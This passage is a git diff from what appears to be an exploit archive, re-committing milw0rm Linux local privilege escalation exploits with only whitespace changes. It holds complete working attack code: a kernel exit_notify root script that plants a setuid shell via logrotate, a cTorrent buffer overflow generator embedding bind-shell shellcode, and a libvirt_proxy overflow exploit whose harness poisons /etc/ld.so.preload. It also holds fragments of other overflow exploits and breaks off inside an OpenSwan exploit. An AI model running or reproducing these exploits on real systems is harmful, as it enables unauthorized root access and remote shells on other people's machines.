installed, that's good!" -else -echo "No logrotate installed, sorry!";exit -fi - -echo -e "Compiling the bash setuid() wrapper..." -cat >> /tmp/.m.c << EOF -#include -#include - -int main() -{ - setuid(0); - execl("/bin/bash","[kthreadd]",NULL); -} -EOF - -cc /tmp/.m.c -o /tmp/.m -rm /tmp/.m.c - -echo -e "Compiling the exploit code..." 
- -cat >> /tmp/exploit.c << EOF -#include -#include -#include -#include -#include - -int child(void *data) -{ - sleep(2); - printf("I'm gonna kill the suidroot father without having root rights :D\n"); - execl("/usr/bin/gpasswd","%s",NULL); - exit(0); -} - -int main() -{ - int stacksize = 4*getpagesize(); - void *stack, *stacktop; - stack = malloc(stacksize); - stacktop = stack + stacksize; - chdir("/etc/logrotate.d"); - int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL); - if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL); -} -EOF - -cc /tmp/exploit.c -o /tmp/.ex -rm /tmp/exploit.c - -echo -e "Setting coredump limits and running the exploit...\n" -ulimit -c 10000 -touch /tmp/.a -`/tmp/.ex >/dev/null 2>/dev/null` -sleep 5 -rm /tmp/.ex - -if [ -e /etc/logrotate.d/core ]; then -echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n" -echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root" -echo -e "\nYour terminal is most probably screwed now, sorry for that..." -exit -fi - -echo "The system is not vulnerable, sorry :(" - -# milw0rm.com [2009-04-08] +#!/bin/sh + +################################################################################### +# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit +# +# by Milen Rangelov (gat3way-at-gat3way-dot-eu) +# +# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov. +# Basically it allows us to send arbitrary signals to a privileged (suidroot) +# parent process. Due to a bad check, the child process with appropriate exit signal +# already set can first execute a suidroot binary then exit() and thus bypass +# in-kernel privilege checks. We use chfn and gpasswd for that purpose. +# +# !!!!!!!!!!! +# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. 
The default is 0 +# so you'll be out of luck most of the time. +# So it is not going to be the script kiddies' new killer shit :-) +# !!!!!!!!!!! +# +# if you invent a better way to escalate privileges by sending arbitrary signals to +# the parent process, please mail me :) That was the best I could think of today :-( +# +# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness +# +# Skuchna rabota... +# +#################################################################################### + + + + +SUIDDUMP=`cat /proc/sys/fs/suid_dumpable` +if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi +if [ -d /etc/logrotate.d ]; then +echo "logrotate installed, that's good!" +else +echo "No logrotate installed, sorry!";exit +fi + +echo -e "Compiling the bash setuid() wrapper..." +cat >> /tmp/.m.c << EOF +#include +#include + +int main() +{ + setuid(0); + execl("/bin/bash","[kthreadd]",NULL); +} +EOF + +cc /tmp/.m.c -o /tmp/.m +rm /tmp/.m.c + +echo -e "Compiling the exploit code..." 
+ +cat >> /tmp/exploit.c << EOF +#include +#include +#include +#include +#include + +int child(void *data) +{ + sleep(2); + printf("I'm gonna kill the suidroot father without having root rights :D\n"); + execl("/usr/bin/gpasswd","%s",NULL); + exit(0); +} + +int main() +{ + int stacksize = 4*getpagesize(); + void *stack, *stacktop; + stack = malloc(stacksize); + stacktop = stack + stacksize; + chdir("/etc/logrotate.d"); + int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL); + if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL); +} +EOF + +cc /tmp/exploit.c -o /tmp/.ex +rm /tmp/exploit.c + +echo -e "Setting coredump limits and running the exploit...\n" +ulimit -c 10000 +touch /tmp/.a +`/tmp/.ex >/dev/null 2>/dev/null` +sleep 5 +rm /tmp/.ex + +if [ -e /etc/logrotate.d/core ]; then +echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n" +echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root" +echo -e "\nYour terminal is most probably screwed now, sorry for that..." +exit +fi + +echo "The system is not vulnerable, sorry :(" + +# milw0rm.com [2009-04-08] diff --git a/platforms/linux/local/8470.py b/platforms/linux/local/8470.py index b89dcbd4c..2327f726e 100755 --- a/platforms/linux/local/8470.py +++ b/platforms/linux/local/8470.py 
@@ -1,215 +1,215 @@
-#!/usr/bin/python
-
-#Written By Michael Brooks
-#04/17/2009
-
-#Stack Based Buffer Overflow
-#The vulnerability is in the btFiles::BuildFromMI function
-#inside the btfiles.cpp file
-
-#Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4.27-3-386
-#Can't get the exploit working on a modern linux kernel because of ASLR
-
-#code is using python 2.5
-
-#Home page for cTorrent 1.3.4:
-#http://sourceforge.net/projects/ctorrent/ 161,000+ Downloads
-#dTorrent 3.3.2 is also vulnerable:
-#http://sourceforge.net/projects/dtorrent/ 18,000+ downloads
-
-import sys
-import os
-#This code will take any torrent file and turn it into an exploit.
-USAGE="python exploit.py in_file.torrent out_file.torrent"
-
-def main():
- #Start of the program
- bfile=fileio()
- try:
- bad_torrent=bfile.read_bencode(sys.argv[1])
- except:
- print USAGE
- sys.exit()
-
- exploit_str=create_exploit()
- print("Writing Bytes:"+str(len(exploit_str)))
- bad_torrent["info"]["files"][0]["path"][0]=exploit_str
- try:
- bfile.write_bencode(sys.argv[2], bad_torrent)
- except:
- print USAGE
- sys.exit()
-
-def create_exploit():
- # linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com
- shellcode = "\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27"
- shellcode += "\x1a\xbe\x4e\x83\xeb\xfc\xe2\xf4\x16\xc1\xed\x0d\x74\x70\xbc\x24"
- shellcode += "\x41\x42\x27\xc7\xc6\xd7\x3e\xd8\x64\x48\xd8\x26\x36\x46\xd8\x1d"
- shellcode += "\xae\xfb\xd4\x28\x7f\x4a\xef\x18\xae\xfb\x73\xce\x97\x7c\x6f\xad"
- shellcode += "\xea\x9a\xec\x1c\x71\x59\x37\xaf\x97\x7c\x73\xce\xb4\x70\xbc\x17"
- shellcode += "\x97\x25\x73\xce\x6e\x63\x47\xfe\x2c\x48\xd6\x61\x08\x69\xd6\x26"
- shellcode += "\x08\x78\xd7\x20\xae\xf9\xec\x1d\xae\xfb\x73\xce"
-
- #The exact address of our buffer is 0xbffffccc, which ebx tells us
- #however memeory changes before we control the eip,
- #so we change the addr to hit the NOP sled
- eip="\x11\xf1\xff\xbf"
- #eip="\xcc\xfc\xff\xbf"#the add ebx is holding
-
- #this is a dummy address to satisfy other pointer before we return
- #this cannot be the EIP becuase this location is written to!
- dumb_addr="\xcc\xfc\xff\xbf"
-
- #nop sled
- long_str="\x90"*(4028-len(shellcode))
- #memory around the shellcode is written to, but this is a safe place
- long_str+=shellcode
- #this 100byte buffer is written to before we control the eip
- long_str+="\x90"*100
- long_str+=eip#4128 bytes is the EIP!
-
- #This pointer must be real becuase it is written to in btFiles::BuildFromMI
- long_str+=dumb_addr#"this"
- #We can control these addresses but we don't need them
- #long_str+=dumb_addr#"metabuf"
- #long_str+=dumb_addr#"saveas"
- return long_str
-
-#Start of functions for bencoding:
-def BTFailure(msg):
- pass
-
-def decode_int(x, f):
- f += 1
- newf = x.index('e', f)
- n = int(x[f:newf])
- if x[f] == '-':
- if x[f + 1] == '0':
- raise ValueError
- elif x[f] == '0' and newf != f+1:
- raise ValueError
- return (n, newf+1)
-
-def decode_string(x, f):
- colon = x.index(':', f)
- n = int(x[f:colon])
- if x[f] == '0' and colon != f+1:
- raise ValueError
- colon += 1
- return (x[colon:colon+n], colon+n)
-
-def decode_list(x, f):
- r, f = [], f+1
- while x[f] != 'e':
- v, f = decode_func[x[f]](x, f)
- r.append(v)
- return (r, f + 1)
-
-def decode_dict(x, f):
- r, f = {}, f+1
- while x[f] != 'e':
- k, f = decode_string(x, f)
- r[k], f = decode_func[x[f]](x, f)
- return (r, f + 1)
-
-decode_func = {}
-decode_func['l'] = decode_list
-decode_func['d'] = decode_dict
-decode_func['i'] = decode_int
-decode_func['0'] = decode_string
-decode_func['1'] = decode_string
-decode_func['2'] = decode_string
-decode_func['3'] = decode_string
-decode_func['4'] = decode_string
-decode_func['5'] = decode_string
-decode_func['6'] = decode_string
-decode_func['7'] = decode_string
-decode_func['8'] = decode_string
-decode_func['9'] = decode_string
-
-def bdecode(x):
- try:
- r, l = decode_func[x[0]](x, 0)
- except (IndexError, KeyError, ValueError):
- raise BTFailure("not a valid bencoded string")
- if l != len(x):
- raise BTFailure("invalid bencoded value (data after valid prefix)")
- return r
-
-from types import StringType, IntType, LongType, DictType, ListType, TupleType
-
-
-class Bencached(object):
-
- __slots__ = ['bencoded']
-
- def __init__(self, s):
- self.bencoded = s
-
-def encode_bencached(x,r):
- r.append(x.bencoded)
-
-def encode_int(x, r):
- r.extend(('i', str(x), 'e'))
-
-def encode_bool(x, r):
- if x:
- encode_int(1, r)
- else:
- encode_int(0, r)
-
-def encode_string(x, r):
- r.extend((str(len(x)), ':', x))
-
-def encode_list(x, r):
- r.append('l')
- for i in x:
- encode_func[type(i)](i, r)
- r.append('e')
-
-def encode_dict(x,r):
- r.append('d')
- ilist = x.items()
- ilist.sort()
- for k, v in ilist:
- r.extend((str(len(k)), ':', k))
- encode_func[type(v)](v, r)
- r.append('e')
-
-encode_func = {}
-encode_func[Bencached] = encode_bencached
-encode_func[IntType] = encode_int
-encode_func[LongType] = encode_int
-encode_func[StringType] = encode_string
-encode_func[ListType] = encode_list
-encode_func[TupleType] = encode_list
-encode_func[DictType] = encode_dict
-
-try:
- from types import BooleanType
- encode_func[BooleanType] = encode_bool
-except ImportError:
- pass
-
-def bencode(x):
- r = []
- encode_func[type(x)](x, r)
- return ''.join(r)
-
-class fileio:
- def read_bencode(self,file):
- infile = open(file,"r")
- file=infile.read()
- infile.close
- return bdecode(file)
-
- #writes a dictionary to a bencoded file
- def write_bencode(self,file,dict):
- outfile = open(file, 'wb')
- outfile.write(bencode(dict))
- outfile.close()
-
-#execute main
-main()
-
-# milw0rm.com [2009-04-17]
+#!/usr/bin/python
+
+#Written By Michael Brooks
+#04/17/2009
+
+#Stack Based Buffer Overflow
+#The vulnerability is in the btFiles::BuildFromMI function
+#inside the btfiles.cpp file
+
+#Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4.27-3-386
+#Can't get the exploit working on a modern linux kernel because of ASLR
+
+#code is using python 2.5
+
+#Home page for cTorrent 1.3.4:
+#http://sourceforge.net/projects/ctorrent/ 161,000+ Downloads
+#dTorrent 3.3.2 is also vulnerable:
+#http://sourceforge.net/projects/dtorrent/ 18,000+ downloads
+
+import sys
+import os
+#This code will take any torrent file and turn it into an exploit.
+USAGE="python exploit.py in_file.torrent out_file.torrent"
+
+def main():
+ #Start of the program
+ bfile=fileio()
+ try:
+ bad_torrent=bfile.read_bencode(sys.argv[1])
+ except:
+ print USAGE
+ sys.exit()
+
+ exploit_str=create_exploit()
+ print("Writing Bytes:"+str(len(exploit_str)))
+ bad_torrent["info"]["files"][0]["path"][0]=exploit_str
+ try:
+ bfile.write_bencode(sys.argv[2], bad_torrent)
+ except:
+ print USAGE
+ sys.exit()
+
+def create_exploit():
+ # linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com
+ shellcode = "\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27"
+ shellcode += "\x1a\xbe\x4e\x83\xeb\xfc\xe2\xf4\x16\xc1\xed\x0d\x74\x70\xbc\x24"
+ shellcode += "\x41\x42\x27\xc7\xc6\xd7\x3e\xd8\x64\x48\xd8\x26\x36\x46\xd8\x1d"
+ shellcode += "\xae\xfb\xd4\x28\x7f\x4a\xef\x18\xae\xfb\x73\xce\x97\x7c\x6f\xad"
+ shellcode += "\xea\x9a\xec\x1c\x71\x59\x37\xaf\x97\x7c\x73\xce\xb4\x70\xbc\x17"
+ shellcode += "\x97\x25\x73\xce\x6e\x63\x47\xfe\x2c\x48\xd6\x61\x08\x69\xd6\x26"
+ shellcode += "\x08\x78\xd7\x20\xae\xf9\xec\x1d\xae\xfb\x73\xce"
+
+ #The exact address of our buffer is 0xbffffccc, which ebx tells us
+ #however memeory changes before we control the eip,
+ #so we change the addr to hit the NOP sled
+ eip="\x11\xf1\xff\xbf"
+ #eip="\xcc\xfc\xff\xbf"#the add ebx is holding
+
+ #this is a dummy address to satisfy other pointer before we return
+ #this cannot be the EIP becuase this location is written to!
+ dumb_addr="\xcc\xfc\xff\xbf"
+
+ #nop sled
+ long_str="\x90"*(4028-len(shellcode))
+ #memory around the shellcode is written to, but this is a safe place
+ long_str+=shellcode
+ #this 100byte buffer is written to before we control the eip
+ long_str+="\x90"*100
+ long_str+=eip#4128 bytes is the EIP!
+
+ #This pointer must be real becuase it is written to in btFiles::BuildFromMI
+ long_str+=dumb_addr#"this"
+ #We can control these addresses but we don't need them
+ #long_str+=dumb_addr#"metabuf"
+ #long_str+=dumb_addr#"saveas"
+ return long_str
+
+#Start of functions for bencoding:
+def BTFailure(msg):
+ pass
+
+def decode_int(x, f):
+ f += 1
+ newf = x.index('e', f)
+ n = int(x[f:newf])
+ if x[f] == '-':
+ if x[f + 1] == '0':
+ raise ValueError
+ elif x[f] == '0' and newf != f+1:
+ raise ValueError
+ return (n, newf+1)
+
+def decode_string(x, f):
+ colon = x.index(':', f)
+ n = int(x[f:colon])
+ if x[f] == '0' and colon != f+1:
+ raise ValueError
+ colon += 1
+ return (x[colon:colon+n], colon+n)
+
+def decode_list(x, f):
+ r, f = [], f+1
+ while x[f] != 'e':
+ v, f = decode_func[x[f]](x, f)
+ r.append(v)
+ return (r, f + 1)
+
+def decode_dict(x, f):
+ r, f = {}, f+1
+ while x[f] != 'e':
+ k, f = decode_string(x, f)
+ r[k], f = decode_func[x[f]](x, f)
+ return (r, f + 1)
+
+decode_func = {}
+decode_func['l'] = decode_list
+decode_func['d'] = decode_dict
+decode_func['i'] = decode_int
+decode_func['0'] = decode_string
+decode_func['1'] = decode_string
+decode_func['2'] = decode_string
+decode_func['3'] = decode_string
+decode_func['4'] = decode_string
+decode_func['5'] = decode_string
+decode_func['6'] = decode_string
+decode_func['7'] = decode_string
+decode_func['8'] = decode_string
+decode_func['9'] = decode_string
+
+def bdecode(x):
+ try:
+ r, l = decode_func[x[0]](x, 0)
+ except (IndexError, KeyError, ValueError):
+ raise BTFailure("not a valid bencoded string")
+ if l != len(x):
+ raise BTFailure("invalid bencoded value (data after valid prefix)")
+ return r
+
+from types import StringType, IntType, LongType, DictType, ListType, TupleType
+
+
+class Bencached(object):
+
+ __slots__ = ['bencoded']
+
+ def __init__(self, s):
+ self.bencoded = s
+
+def encode_bencached(x,r):
+ r.append(x.bencoded)
+
+def encode_int(x, r):
+ r.extend(('i', str(x), 'e'))
+
+def encode_bool(x, r):
+ if x:
+ encode_int(1, r)
+ else:
+ encode_int(0, r)
+
+def encode_string(x, r):
+ r.extend((str(len(x)), ':', x))
+
+def encode_list(x, r):
+ r.append('l')
+ for i in x:
+ encode_func[type(i)](i, r)
+ r.append('e')
+
+def encode_dict(x,r):
+ r.append('d')
+ ilist = x.items()
+ ilist.sort()
+ for k, v in ilist:
+ r.extend((str(len(k)), ':', k))
+ encode_func[type(v)](v, r)
+ r.append('e')
+
+encode_func = {}
+encode_func[Bencached] = encode_bencached
+encode_func[IntType] = encode_int
+encode_func[LongType] = encode_int
+encode_func[StringType] = encode_string
+encode_func[ListType] = encode_list
+encode_func[TupleType] = encode_list
+encode_func[DictType] = encode_dict
+
+try:
+ from types import BooleanType
+ encode_func[BooleanType] = encode_bool
+except ImportError:
+ pass
+
+def bencode(x):
+ r = []
+ encode_func[type(x)](x, r)
+ return ''.join(r)
+
+class fileio:
+ def read_bencode(self,file):
+ infile = open(file,"r")
+ file=infile.read()
+ infile.close
+ return bdecode(file)
+
+ #writes a dictionary to a bencoded file
+ def write_bencode(self,file,dict):
+ outfile = open(file, 'wb')
+ outfile.write(bencode(dict))
+ outfile.close()
+
+#execute main
+main()
+
+# milw0rm.com [2009-04-17]
diff --git a/platforms/linux/local/8534.c b/platforms/linux/local/8534.c
index 0b45b304e..8028c3fc3 100755
--- a/platforms/linux/local/8534.c
+++ b/platforms/linux/local/8534.c
@@ -1,187 +1,187 @@
-/*
- * cve-2009-0036.c
- *
- * libvirt_proxy <= 0.5.1 Local Privilege Escalation Exploit
- * Jon Oberheide
- * http://jon.oberheide.org
- *
- * Information:
- *
- * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0036
- *
- * Buffer overflow in the proxyReadClientSocket function in
- * proxy/libvirt_proxy.c in libvirt_proxy 0.5.1 might allow local users to
- * gain privileges by sending a portion of the header of a virProxyPacket
- * packet, and then sending the remainder of the packet with crafted values
- * in the header, related to use of uninitialized memory in a validation
- * check.
- *
- * Usage:
- *
- * We're guessing to hit our NOP sled, so this program should be run in a
- * harness. Since the shellcode will execute /tmp/run as root, the following
- * harness will insert a malicious getuid.so payload in /etc/ld.so.preload.
- *
- * #!/bin/sh
- *
- * echo "[+] compiling the exploit"
- * gcc cve-2009-0036.c -o cve-2009-0036
- *
- * echo "[+] creating /tmp/getuid.so"
- * echo "int getuid(){return 0;}" > /tmp/getuid.c
- * gcc -shared /tmp/getuid.c -o /tmp/getuid.so
- *
- * echo "[+] setting up /tmp/run"
- * echo -e "#!/bin/sh" > /tmp/run
- * echo -e "touch /tmp/success" >> /tmp/run
- * echo -e "echo \"/tmp/getuid.so\" > /etc/ld.so.preload" >> /tmp/run
- * chmod +x /tmp/run
- *
- * echo "[+] starting exploit loop"
- * i=0
- * rm -f /tmp/success
- * while [ ! -e "/tmp/success" ]
- * do
- * i=$(($i+1))
- * echo "RUN NUMBER $i"
- * ./cve-2009-0036
- * done
- *
- * echo "[+] our getuid.so is now in ld.so.preload"
- * echo "[+] running su to obtain root shell"
- * su
- *
- * Notes:
- *
- * Tested on Gentoo Linux 32-bit with GCC 4.3.3-r2 and randomize_va_space=1.
- * We have a 4096 byte NOP sled before shellcode and EIP followed by 1000
- * NOP/30 byte shellcode bundles until we cause a EFAULT in libvirt_proxy's
- * read(2). Our total sled is usually around 5k-10k NOPs so it'll take
- * ~800-1600 tries on average to hit it and execute our shellcode. Each run
- * takes ~1 second, so exploitation will probably take 10-20 minutes on
- * average.
- */
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define PROXY_PATH "/usr/libexec/libvirt_proxy"
-#define PROXY_SOCKET_PATH "/tmp/livirt_proxy_conn"
-#define PROXY_PROTO_VERSION 1
-#define PROXY_PACKET_LENGTH 0xffff
-
-/* simple shellcode to execute /tmp/run */
-const char shellcode[]=
- "\x31\xdb"
- "\x8d\x43\x17"
- "\x99"
- "\xcd\x80"
- "\x31\xc9"
- "\x51"
- "\x68\x2f\x72\x75\x6e"
- "\x68\x2f\x74\x6d\x70"
- "\x8d\x41\x0b"
- "\x89\xe3"
- "\xcd\x80";
-
-struct proxy_packet {
- uint16_t version;
- uint16_t command;
- uint16_t serial;
- uint16_t len;
-};
-
-int
-main(int argc, char **argv)
-{
- FILE *fp;
- long ptr;
- int i, fd, pid, ret;
- char *pkt, nop[65536];
- struct sockaddr_un addr;
- struct proxy_packet req;
- struct timeval tv;
-
- signal(SIGPIPE, SIG_IGN);
-
- /* guess a random offset to jmp to */
- gettimeofday(&tv, NULL);
- srand((tv.tv_sec ^ tv.tv_usec) ^ getpid());
- ptr = 0xbf000000 + (rand() & 0x00ffffff);
-
- /* fire up the setuid libvirt_proxy */
- pid = fork();
- if (pid == 0) {
- execl(PROXY_PATH, "libvirt_proxy", NULL);
- }
-
- memset(nop, '\x90', sizeof(nop));
-
- /* connect to libvirt_proxy's AF_UNIX socket */
- fd = socket(PF_UNIX, SOCK_STREAM, 0);
- if (fd < 0) {
- printf("[-] failed to create unix socket\n");
- return 1;
- }
-
- memset(&addr, 0, sizeof(addr));
- addr.sun_family = AF_UNIX;
- addr.sun_path[0] = '\0';
- strncpy(&addr.sun_path[1], PROXY_SOCKET_PATH, strlen(PROXY_SOCKET_PATH));
-
- printf("[+] connecting to libvirt_proxy\n");
-
- if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
- printf("[-] cant connect to libvirt_proxy socket\n");
- return 1;
- }
-
- /* transmit malicious payload to libvirt_proxy */
- pkt = (char *) &req;
- memset(&req, 0, sizeof(req));
- req.version = PROXY_PROTO_VERSION;
- req.len = PROXY_PACKET_LENGTH;
-
- printf("[+] sending initial packet header\n");
- send(fd, pkt, 7, 0);
-
- usleep(100000);
-
- printf("[+] sending corrupted length value\n");
- send(fd, pkt + 7, 1, 0);
-
- printf("[+] sending primary NOP sled\n");
- send(fd, nop, 4096, 0);
-
- printf("[+] sending primary shellcode\n");
- send(fd, shellcode, 28, 0);
-
- printf("[+] sending EIP overwrite (0x%lx)\n", ptr);
- send(fd, &ptr, 4, 0);
-
- usleep(100000);
-
- printf("[+] sending secondary NOP/shellcode bundles\n");
- for (i = 0; i < 100; ++i) {
- send(fd, nop, 1000, 0);
- send(fd, shellcode, 28, 0);
- }
- close(fd);
-
- usleep(800000);
-
- /* clean slate if our guessed addr failed */
- kill(pid, SIGKILL);
-
- return 0;
-}
-
-// milw0rm.com [2009-04-27]
+/*
+ * cve-2009-0036.c
+ *
+ * libvirt_proxy <= 0.5.1 Local Privilege Escalation Exploit
+ * Jon Oberheide
+ * http://jon.oberheide.org
+ *
+ * Information:
+ *
+ * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0036
+ *
+ * Buffer overflow in the proxyReadClientSocket function in
+ * proxy/libvirt_proxy.c in libvirt_proxy 0.5.1 might allow local users to
+ * gain privileges by sending a portion of the header of a virProxyPacket
+ * packet, and then sending the remainder of the packet with crafted values
+ * in the header, related to use of uninitialized memory in a validation
+ * check.
+ *
+ * Usage:
+ *
+ * We're guessing to hit our NOP sled, so this program should be run in a
+ * harness. Since the shellcode will execute /tmp/run as root, the following
+ * harness will insert a malicious getuid.so payload in /etc/ld.so.preload.
+ *
+ * #!/bin/sh
+ *
+ * echo "[+] compiling the exploit"
+ * gcc cve-2009-0036.c -o cve-2009-0036
+ *
+ * echo "[+] creating /tmp/getuid.so"
+ * echo "int getuid(){return 0;}" > /tmp/getuid.c
+ * gcc -shared /tmp/getuid.c -o /tmp/getuid.so
+ *
+ * echo "[+] setting up /tmp/run"
+ * echo -e "#!/bin/sh" > /tmp/run
+ * echo -e "touch /tmp/success" >> /tmp/run
+ * echo -e "echo \"/tmp/getuid.so\" > /etc/ld.so.preload" >> /tmp/run
+ * chmod +x /tmp/run
+ *
+ * echo "[+] starting exploit loop"
+ * i=0
+ * rm -f /tmp/success
+ * while [ ! -e "/tmp/success" ]
+ * do
+ * i=$(($i+1))
+ * echo "RUN NUMBER $i"
+ * ./cve-2009-0036
+ * done
+ *
+ * echo "[+] our getuid.so is now in ld.so.preload"
+ * echo "[+] running su to obtain root shell"
+ * su
+ *
+ * Notes:
+ *
+ * Tested on Gentoo Linux 32-bit with GCC 4.3.3-r2 and randomize_va_space=1.
+ * We have a 4096 byte NOP sled before shellcode and EIP followed by 1000
+ * NOP/30 byte shellcode bundles until we cause a EFAULT in libvirt_proxy's
+ * read(2). Our total sled is usually around 5k-10k NOPs so it'll take
+ * ~800-1600 tries on average to hit it and execute our shellcode. Each run
+ * takes ~1 second, so exploitation will probably take 10-20 minutes on
+ * average.
+ */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define PROXY_PATH "/usr/libexec/libvirt_proxy" +#define PROXY_SOCKET_PATH "/tmp/livirt_proxy_conn" +#define PROXY_PROTO_VERSION 1 +#define PROXY_PACKET_LENGTH 0xffff + +/* simple shellcode to execute /tmp/run */ +const char shellcode[]= + "\x31\xdb" + "\x8d\x43\x17" + "\x99" + "\xcd\x80" + "\x31\xc9" + "\x51" + "\x68\x2f\x72\x75\x6e" + "\x68\x2f\x74\x6d\x70" + "\x8d\x41\x0b" + "\x89\xe3" + "\xcd\x80"; + +struct proxy_packet { + uint16_t version; + uint16_t command; + uint16_t serial; + uint16_t len; +}; + +int +main(int argc, char **argv) +{ + FILE *fp; + long ptr; + int i, fd, pid, ret; + char *pkt, nop[65536]; + struct sockaddr_un addr; + struct proxy_packet req; + struct timeval tv; + + signal(SIGPIPE, SIG_IGN); + + /* guess a random offset to jmp to */ + gettimeofday(&tv, NULL); + srand((tv.tv_sec ^ tv.tv_usec) ^ getpid()); + ptr = 0xbf000000 + (rand() & 0x00ffffff); + + /* fire up the setuid libvirt_proxy */ + pid = fork(); + if (pid == 0) { + execl(PROXY_PATH, "libvirt_proxy", NULL); + } + + memset(nop, '\x90', sizeof(nop)); + + /* connect to libvirt_proxy's AF_UNIX socket */ + fd = socket(PF_UNIX, SOCK_STREAM, 0); + if (fd < 0) { + printf("[-] failed to create unix socket\n"); + return 1; + } + + memset(&addr, 0, sizeof(addr)); + addr.sun_family = AF_UNIX; + addr.sun_path[0] = '\0'; + strncpy(&addr.sun_path[1], PROXY_SOCKET_PATH, strlen(PROXY_SOCKET_PATH)); + + printf("[+] connecting to libvirt_proxy\n"); + + if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) < 0) { + printf("[-] cant connect to libvirt_proxy socket\n"); + return 1; + } + + /* transmit malicious payload to libvirt_proxy */ + pkt = (char *) &req; + memset(&req, 0, sizeof(req)); + req.version = PROXY_PROTO_VERSION; + req.len = PROXY_PACKET_LENGTH; + + printf("[+] sending initial packet header\n"); + send(fd, pkt, 7, 0); + + usleep(100000); + + printf("[+] sending corrupted 
length value\n"); + send(fd, pkt + 7, 1, 0); + + printf("[+] sending primary NOP sled\n"); + send(fd, nop, 4096, 0); + + printf("[+] sending primary shellcode\n"); + send(fd, shellcode, 28, 0); + + printf("[+] sending EIP overwrite (0x%lx)\n", ptr); + send(fd, &ptr, 4, 0); + + usleep(100000); + + printf("[+] sending secondary NOP/shellcode bundles\n"); + for (i = 0; i < 100; ++i) { + send(fd, nop, 1000, 0); + send(fd, shellcode, 28, 0); + } + close(fd); + + usleep(800000); + + /* clean slate if our guessed addr failed */ + kill(pid, SIGKILL); + + return 0; +} + +// milw0rm.com [2009-04-27] diff --git a/platforms/linux/local/876.c b/platforms/linux/local/876.c index cdc1c519b..d3115e590 100755 --- a/platforms/linux/local/876.c +++ b/platforms/linux/local/876.c @@ -153,6 +153,6 @@ int main( void ) printf( "shit happens\n" ); return( 1 ); -} - -// milw0rm.com [2005-03-14] +} + +// milw0rm.com [2005-03-14] diff --git a/platforms/linux/local/877.pl b/platforms/linux/local/877.pl index 5200f6883..3378c1e17 100755 --- a/platforms/linux/local/877.pl +++ b/platforms/linux/local/877.pl @@ -44,6 +44,6 @@ $buf = "A" x 8732; $buf .= (pack("l",(0xbfffffff-512+$offset)) x2); #exec("strace -u kfinisterre /usr/games/luxman -r 1 -f $buf"); -exec("/usr/games/luxman -r 1 -f $buf"); - -# milw0rm.com [2005-03-14] +exec("/usr/games/luxman -r 1 -f $buf"); + +# milw0rm.com [2005-03-14] diff --git a/platforms/linux/local/890.pl b/platforms/linux/local/890.pl index dc44c6d25..8afe33f1b 100755 --- a/platforms/linux/local/890.pl +++ b/platforms/linux/local/890.pl @@ -47,6 +47,6 @@ until(length($buffer)==$len) { $buffer.=$new_ret; } -exec("$oops -8 $buffer"); - -# milw0rm.com [2005-03-21] +exec("$oops -8 $buffer"); + +# milw0rm.com [2005-03-21] diff --git a/platforms/linux/local/895.c b/platforms/linux/local/895.c index 9c10d1bba..193a60cba 100755 --- a/platforms/linux/local/895.c +++ b/platforms/linux/local/895.c 
@@ -561,6 +561,6 @@ n = waitpid(t2, NULL, __WCLONE); printf("waitpid got %d/%d\n", n, errno); // killall(); cleanup(); -} - -// milw0rm.com [2005-03-22] +} + +// milw0rm.com [2005-03-22] diff --git a/platforms/linux/local/913.pl b/platforms/linux/local/913.pl index 6a87504c0..a1a7f5fbf 100755 --- a/platforms/linux/local/913.pl +++ b/platforms/linux/local/913.pl @@ -43,6 +43,6 @@ until (length($buffer) == $buf) { $buffer .= $new_ret; } -local($ENV{'HOME'}) = $buffer; exec("/home/lammat/aeon-0.2a/aeon $i"); - -# milw0rm.com [2005-04-05] +local($ENV{'HOME'}) = $buffer; exec("/home/lammat/aeon-0.2a/aeon $i"); + +# milw0rm.com [2005-04-05] diff --git a/platforms/linux/local/9135.sh b/platforms/linux/local/9135.sh index dc5297628..6ce1bc893 100755 --- a/platforms/linux/local/9135.sh +++ b/platforms/linux/local/9135.sh 
@@ -1,32 +1,32 @@
-#!/bin/bash
-# uglyswan - OpenSwan local root exploit (CVE-2008-4190)
-#
-# description:
-# The IPSEC livetest tool in Openswan 2.4.12 and earlier, and 2.6.x through 2.6.16,
-# allows local users to overwrite arbitrary files and execute arbitrary code via a
-# symlink attack on the (1) ipseclive.conn and (2) ipsec.olts.remote.log temporary files.
-# NOTE: in many distributions and the upstream version, this tool has been disabled.
-#
-# vulnerable code:
-# wget -o /dev/null -O /tmp/ipseclive.conn "http://192.168.0.1/olts/?leftid=$leftid&$leftrsasigkey&version=$version"
-# sh < /tmp/ipseclive.conn
-#
-# the exploit:
-# cat waits for the input from wget to the fifo and after it received it, you
